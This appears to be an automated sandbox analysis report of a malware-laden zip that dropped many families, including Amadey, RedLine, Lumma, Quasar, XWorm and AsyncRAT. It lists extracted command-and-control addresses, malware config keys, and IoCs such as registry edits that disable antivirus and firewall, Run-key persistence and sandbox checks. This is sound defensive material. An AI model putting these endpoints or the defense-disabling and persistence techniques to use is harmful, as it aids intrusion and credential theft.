amadey | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
927s
max time network
1141s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
18/11/2024, 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe.zip
Size

4KB
MD5

16d34133af438a73419a49de605576d9
SHA1

c3dbcd70359fdad8835091c714a7a275c59bd732
SHA256

e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
SHA512

59c0272d6faa2682b7a6ce1cd414d53cc39f06035f4f38a2e206965805034bf8012b02d59f428973965136d70c89f87ac3b17b5db9c1b1d49844be182b47a3d7
SSDEEP

96:xBf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEy:xBfwncSf8Cv3w9DZjKXjmBIKEvLs97D5

Malware Config

Extracted

Family

stealc

Botnet

default2

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

redline

Botnet

091024

185.215.113.67:33160

Extracted

Family

xworm

0.tcp.in.ngrok.io:15792

127.0.0.1:6000

103.211.201.109:6000

193.222.96.100:5555

Attributes

Install_directory
%AppData%
install_file
svсhost.exe

Extracted

Family

metasploit

Version

windows/reverse_tcp

89.197.154.116:7810

Extracted

Family

lumma

https://weiggheticulop.shop/api

https://consciousourwi.shop/api

https://southedhiscuso.shop/api

https://deicedosmzj.shop/api

https://cagedwifedsozm.shop/api

https://charecteristicdxp.shop/api

https://interactiedovspm.shop/api

https://potentioallykeos.shop/api

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.1.101:4782

Mutex

20f2b2b5-8392-4fbe-9585-0778c516b863

Attributes

encryption_key
3A9499E06EC8E749CF7AE8F7D466BD97D9B2380C
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

stealc

Botnet

default

http://95.217.96.249

Attributes

url_path
/bc00174e4ec6d418.php

Extracted

Family

redline

Botnet

LiveTraffic

95.179.250.45:26212

Extracted

Family

amadey

Version

5.04

Botnet

608ae0

http://185.208.159.121

Attributes

install_dir
d71abd0bd9
install_file
Gxtuum.exe
strings_key
353f19792cc9942438e61b6e87ba3d87
url_paths
/8djjd3Shf2/index.php

rc4.plain

Extracted

Family

amadey

Version

5.03

Botnet

7c4393

http://185.215.113.217

Attributes

install_dir
f9c76c1660
install_file
corept.exe
strings_key
9808a67f01d2f0720518035acbde7521
url_paths
/CoreOPT/index.php

rc4.plain

Extracted

Family

redline

38.180.109.140:20007

Extracted

Family

quasar

Version

1.4.1

Botnet

newoffice

117.18.7.76:3782

Mutex

d908c8ed-ea88-484e-a3d2-dcbe66ac7cfc

Attributes

encryption_key
FD2DE574AF7E363A5304DF85B3475F93A948C103
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Main

tpinauskas-54803.portmap.host:54803

Mutex

8422dcc2-b8bd-4080-a017-5b62524b6546

Attributes

encryption_key
2EFF7393DC1BD9FBDDD61A780B994B8166BAB8EC
install_name
Win64.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Win64
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:17027

2.tcp.ngrok.io:6606

2.tcp.ngrok.io:7707

2.tcp.ngrok.io:8808

2.tcp.ngrok.io:8080

2.tcp.ngrok.io:17027

Mutex

KSKA6RWWOYIu

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

154.197.69.165:7000

Mutex

jcTVbnlMjCEJAYCp

Attributes

Install_directory
%AppData%
install_file
crss.exe

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 4 IoCs

resource	yara_rule
behavioral2/files/0x00140000000459c7-4018.dat	family_ammyyadmin
behavioral2/files/0x0013000000045aca-12431.dat	family_ammyyadmin
behavioral2/files/0x000b000000040ed3-22335.dat	family_ammyyadmin
behavioral2/files/0x0007000000045d2c-23656.dat	family_ammyyadmin

Ammyyadmin family
ammyyadmin
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral2/memory/3044-2909-0x0000000000400000-0x0000000002470000-memory.dmp	family_vidar_v7
behavioral2/memory/3044-2934-0x0000000000400000-0x0000000002470000-memory.dmp	family_vidar_v7
behavioral2/files/0x000b000000045c61-19924.dat	family_vidar_v7

Detect Xworm Payload 10 IoCs

resource	yara_rule
behavioral2/files/0x0015000000045940-3058.dat	family_xworm
behavioral2/memory/4356-3069-0x0000000000320000-0x0000000000336000-memory.dmp	family_xworm
behavioral2/files/0x00150000000459c0-3930.dat	family_xworm
behavioral2/memory/5792-3938-0x00000000006C0000-0x00000000006D6000-memory.dmp	family_xworm
behavioral2/files/0x0013000000045a16-5588.dat	family_xworm
behavioral2/memory/7332-5635-0x0000000000630000-0x0000000000648000-memory.dmp	family_xworm
behavioral2/files/0x0013000000045a69-7207.dat	family_xworm
behavioral2/memory/1524-7858-0x0000000000440000-0x0000000000450000-memory.dmp	family_xworm
behavioral2/files/0x0008000000045c8d-22762.dat	family_xworm
behavioral2/files/0x0026000000040f58-22729.dat	family_xworm

Detects ZharkBot payload 3 IoCs

ZharkBot is a botnet written C++.

resource	yara_rule
behavioral2/files/0x00290000000451b0-3307.dat	zharkcore
behavioral2/files/0x00160000000459d7-4050.dat	zharkcore
behavioral2/files/0x000b000000040858-12003.dat	zharkcore

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Flawedammyy family
flawedammyy
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Phorphiex family
phorphiex

Phorphiex payload 5 IoCs

resource	yara_rule
behavioral2/files/0x001500000004593d-3032.dat	family_phorphiex
behavioral2/files/0x00150000000459c2-3943.dat	family_phorphiex
behavioral2/files/0x00170000000459cb-3990.dat	family_phorphiex
behavioral2/files/0x00170000000459cc-3998.dat	family_phorphiex
behavioral2/files/0x0018000000045c69-22378.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 8 IoCs

resource	yara_rule
behavioral2/files/0x001500000004596b-3373.dat	family_quasar
behavioral2/memory/1744-3375-0x0000000000110000-0x0000000000434000-memory.dmp	family_quasar
behavioral2/files/0x00150000000459fb-4948.dat	family_quasar
behavioral2/memory/7316-5385-0x0000000005EB0000-0x00000000061D4000-memory.dmp	family_quasar
behavioral2/memory/8020-5384-0x0000000000920000-0x0000000000C60000-memory.dmp	family_quasar
behavioral2/files/0x0015000000045a68-7592.dat	family_quasar
behavioral2/files/0x000d000000045c33-22401.dat	family_quasar
behavioral2/files/0x001d000000045c63-22508.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

resource	yara_rule
behavioral2/files/0x002e0000000451b2-2861.dat	family_redline
behavioral2/memory/1988-2871-0x0000000000CD0000-0x0000000000D22000-memory.dmp	family_redline
behavioral2/memory/5448-3525-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral2/files/0x00160000000459ef-4119.dat	family_redline
behavioral2/memory/2536-4127-0x0000000000910000-0x0000000000962000-memory.dmp	family_redline
behavioral2/files/0x0015000000045b4b-19481.dat	family_redline
behavioral2/files/0x0013000000045c6b-22367.dat	family_redline
behavioral2/files/0x0008000000045c7a-22533.dat	family_redline
behavioral2/files/0x0009000000045ca0-23187.dat	family_redline
behavioral2/files/0x0007000000045d28-23609.dat	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0013000000045c6b-22367.dat	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 2988 created 3560	2988	Jurisdiction.pif	57
PID 2988 created 3560	2988	Jurisdiction.pif	57
PID 3856 created 3560	3856	winupsecvmgr.exe	57
PID 3856 created 3560	3856	winupsecvmgr.exe	57
PID 3856 created 3560	3856	winupsecvmgr.exe	57
PID 5772 created 3560	5772	conhost.exe	57
PID 5772 created 3560	5772	conhost.exe	57
PID 6048 created 3560	6048	winupsecvmgr.exe	57
PID 6048 created 3560	6048	winupsecvmgr.exe	57

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot
Zharkbot family
zharkbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral2/files/0x00170000000459cf-5546.dat	family_asyncrat
behavioral2/files/0x0017000000045997-8737.dat	family_asyncrat
behavioral2/files/0x0012000000045a76-11566.dat	family_asyncrat
behavioral2/files/0x0008000000045d11-23551.dat	family_asyncrat

Contacts a large (48212) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	spoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TigerHulk3.exe

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/memory/3856-3559-0x00007FF67F020000-0x00007FF67F5B7000-memory.dmp	xmrig
behavioral2/memory/5796-3561-0x00007FF7BDDC0000-0x00007FF7BE5AF000-memory.dmp	xmrig
behavioral2/memory/6048-3790-0x00007FF67F020000-0x00007FF67F5B7000-memory.dmp	xmrig
behavioral2/memory/4248-3792-0x00007FF764E90000-0x00007FF76567F000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3552	powershell.exe
5604	powershell.exe
5692	powershell.exe
5444	powershell.exe
1764	powershell.exe
7352	powershell.exe
8436	powershell.exe
320	powershell.exe
4612	powershell.EXE
6848	powershell.exe
6992	powershell.exe
7380	powershell.exe
3416	powershell.exe
976	powershell.exe
8084	powershell.exe
7136	powershell.exe
11504	powershell.exe
8788	powershell.exe
9340	powershell.exe
1148	powershell.exe
6568	powershell.exe
7052	powershell.exe
7132	powershell.exe
11356	powershell.exe
7704	powershell.exe
6592	powershell.exe
7104	powershell.exe
6264	powershell.exe
8220	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
7576	netsh.exe
8908	netsh.exe

Possible privilege escalation attempt 7 IoCs

exploit

pid	Process
3804	icacls.exe
11440	takeown.exe
6084	icacls.exe
10424	takeown.exe
3580	icacls.exe
5488	icacls.exe
32	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/8420-5459-0x0000000004AE0000-0x0000000004B46000-memory.dmp	net_reactor
behavioral2/memory/8420-5466-0x00000000049E0000-0x0000000004A44000-memory.dmp	net_reactor
behavioral2/files/0x000b000000045b74-12305.dat	net_reactor

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	spoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TigerHulk3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TigerHulk3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	spoofer.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	Bloxflip%20Predictor.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	build_2024-07-25_20-56.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	XSploitLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	2621215564.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	splwow64.exe

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Bloxflip Predictor.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Bloxflip%20Predictor.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Bloxflip Predictor.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Bloxflip Predictor.exe

Executes dropped EXE 44 IoCs

pid	Process
4896	4363463463464363463463463.exe
4932	spoofer.exe
5044	stealc_daval.exe
1988	penis.exe
3044	build_2024-07-25_20-56.exe
3288	TigerHulk3.exe
460	Tracker.exe
952	svchost.exe
2824	tdrpload.exe
2784	XSploitLauncher.exe
4356	svchost.exe
1244	newfile.exe
4596	sysppvrdnvs.exe
4904	JJSploit_8.10.7_x64-setup.exe
216	esphvcion.exe
1416	LummaC22222.exe
2752	ZZZ.exe
3264	Bloxflip%20Predictor.exe
2676	ENP.exe
1584	2621215564.exe
4584	wwbizsrvs.exe
1744	Gorebox%20ModMenu%201.2.0.exe
2152	splwow64.exe
2464	BroadcomRetest.exe
1576	Bloxflip Predictor.exe
2988	Jurisdiction.pif
868	52836932.exe
3520	ENP.exe
1776	3374731779.exe
1764	2075125208.exe
864	1281923147.exe
3856	winupsecvmgr.exe
2172	tn8cdkzn.exe
2824	prem1.exe
5124	ConsoleApp3.exe
5352	GOLD.exe
6048	winupsecvmgr.exe
4760	game.exe
1960	runtime.exe
5608	Identification-1.exe
5764	4363463463464363463463463.exe
6128	4363463463464363463463463.exe
5272	LoadNew.exe
5128	file1.exe

Loads dropped DLL 4 IoCs

pid	Process
5044	stealc_daval.exe
5044	stealc_daval.exe
4904	JJSploit_8.10.7_x64-setup.exe
4904	JJSploit_8.10.7_x64-setup.exe

Modifies file permissions 1 TTPs 7 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
11440	takeown.exe
6084	icacls.exe
10424	takeown.exe
3580	icacls.exe
5488	icacls.exe
32	takeown.exe
3804	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0020000000045660-2320.dat	themida
behavioral2/memory/4932-2350-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2378-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2385-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2381-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2379-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2792-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/memory/4932-2905-0x0000000000DF0000-0x000000000150D000-memory.dmp	themida
behavioral2/files/0x0017000000045921-2939.dat	themida
behavioral2/memory/3288-2945-0x00007FF6A5D40000-0x00007FF6A664C000-memory.dmp	themida
behavioral2/memory/3288-2947-0x00007FF6A5D40000-0x00007FF6A664C000-memory.dmp	themida
behavioral2/memory/3288-2948-0x00007FF6A5D40000-0x00007FF6A664C000-memory.dmp	themida
behavioral2/memory/3288-2949-0x00007FF6A5D40000-0x00007FF6A664C000-memory.dmp	themida
behavioral2/memory/3288-2952-0x00007FF6A5D40000-0x00007FF6A664C000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/files/0x0021000000045826-3014.dat	vmprotect
behavioral2/memory/952-3024-0x00007FF6C3AE0000-0x00007FF6C3D1C000-memory.dmp	vmprotect
behavioral2/memory/952-3025-0x00007FF6C3AE0000-0x00007FF6C3D1C000-memory.dmp	vmprotect
behavioral2/memory/952-3027-0x00007FF6C3AE0000-0x00007FF6C3D1C000-memory.dmp	vmprotect

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Bloxflip Predictor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	tdrpload.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svсhost = "C:\\Users\\Admin\\AppData\\Roaming\\svсhost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Windows\\Bloxflip Predictor.exe"	Bloxflip%20Predictor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Bloxflip Predictor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Bloxflip Predictor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Bloxflip Predictor.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	spoofer.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TigerHulk3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 51 IoCs

Web Service

T1102

flow	ioc
808	0.tcp.in.ngrok.io
7285	2.tcp.ngrok.io
31188	2.tcp.ngrok.io
262	raw.githubusercontent.com
13846	0.tcp.in.ngrok.io
50710	raw.githubusercontent.com
51633	raw.githubusercontent.com
18306	bitbucket.org
312	0.tcp.in.ngrok.io
481	raw.githubusercontent.com
483	raw.githubusercontent.com
598	raw.githubusercontent.com
702	raw.githubusercontent.com
1436	2.tcp.ngrok.io
16896	raw.githubusercontent.com
26537	raw.githubusercontent.com
33422	pastebin.com
42786	raw.githubusercontent.com
657	2.tcp.ngrok.io
4507	0.tcp.in.ngrok.io
14446	discord.com
25000	2.tcp.ngrok.io
45962	0.tcp.in.ngrok.io
263	raw.githubusercontent.com
472	pastebin.com
537	0.tcp.in.ngrok.io
545	iplogger.com
597	raw.githubusercontent.com
623	2.tcp.ngrok.io
14450	discord.com
366	discord.com
546	iplogger.com
769	2.tcp.ngrok.io
13679	2.tcp.ngrok.io
16931	raw.githubusercontent.com
17890	bitbucket.org
17894	bitbucket.org
368	discord.com
4056	2.tcp.ngrok.io
15205	discord.com
24782	0.tcp.in.ngrok.io
51774	0.tcp.in.ngrok.io
45270	bitbucket.org
393	0.tcp.in.ngrok.io
474	pastebin.com
19826	raw.githubusercontent.com
33420	pastebin.com
34848	raw.githubusercontent.com
35802	0.tcp.in.ngrok.io
39135	2.tcp.ngrok.io
51666	2.tcp.ngrok.io

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
523	ip-api.com
835	ip-api.com
7253	ip-api.com
15656	api.ipify.org
15736	api.ipify.org
22719	ip-api.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
7584	GameBarPresenceWriter.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
9728	powercfg.exe
11192	powercfg.exe
11512	powercfg.exe
5084	powercfg.exe
10888	powercfg.exe
1528	powercfg.exe
9452	powercfg.exe
8792	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000b000000045c65-19947.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
408	tasklist.exe
4588	tasklist.exe
11380	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4932	spoofer.exe
3288	TigerHulk3.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2824 set thread context of 2872	2824	prem1.exe	210
PID 5352 set thread context of 5448	5352	GOLD.exe	217
PID 3856 set thread context of 5772	3856	winupsecvmgr.exe	220
PID 3856 set thread context of 5796	3856	winupsecvmgr.exe	221
PID 6048 set thread context of 4248	6048	winupsecvmgr.exe	233

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0013000000045a21-5911.dat	upx
behavioral2/memory/8812-5918-0x0000000000F60000-0x00000000014CB000-memory.dmp	upx
behavioral2/files/0x0014000000045a6b-8447.dat	upx
behavioral2/files/0x001b00000004596e-11397.dat	upx
behavioral2/files/0x0011000000045ad6-11882.dat	upx

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Bloxflip Predictor.exe	Bloxflip%20Predictor.exe
File created	C:\Windows\sysppvrdnvs.exe	tdrpload.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	tdrpload.exe
File opened for modification	C:\Windows\LuggageRepresentations	splwow64.exe
File opened for modification	C:\Windows\SixCream	splwow64.exe
File opened for modification	C:\Windows\HomelessLaser	splwow64.exe
File opened for modification	C:\Windows\ActuallyFtp	splwow64.exe
File opened for modification	C:\Windows\EauOfficial	splwow64.exe
File opened for modification	C:\Windows\AdditionsSalvation	splwow64.exe
File opened for modification	C:\Windows\Bloxflip Predictor.exe	attrib.exe

Launches sc.exe 29 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5800	sc.exe
5228	sc.exe
9976	sc.exe
2444	sc.exe
4224	sc.exe
6120	sc.exe
6260	sc.exe
6512	sc.exe
7828	sc.exe
5988	sc.exe
7848	sc.exe
3060	sc.exe
6964	sc.exe
7000	sc.exe
7056	sc.exe
7160	sc.exe
11236	sc.exe
2000	sc.exe
5864	sc.exe
9004	sc.exe
2548	sc.exe
232	sc.exe
5960	sc.exe
1340	sc.exe
7044	sc.exe
6108	sc.exe
6204	sc.exe
4272	sc.exe
7140	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000d000000045b3e-12099.dat	pyinstaller
behavioral2/files/0x0014000000045ac5-18154.dat	pyinstaller
behavioral2/files/0x0007000000045cb0-23305.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 20 IoCs

pid	pid_target	Process	procid_target
4184	3044	WerFault.exe	122
2976	2752	WerFault.exe	162
5200	2824	WerFault.exe	209
6232	3396	WerFault.exe	272
8316	7868	WerFault.exe	418
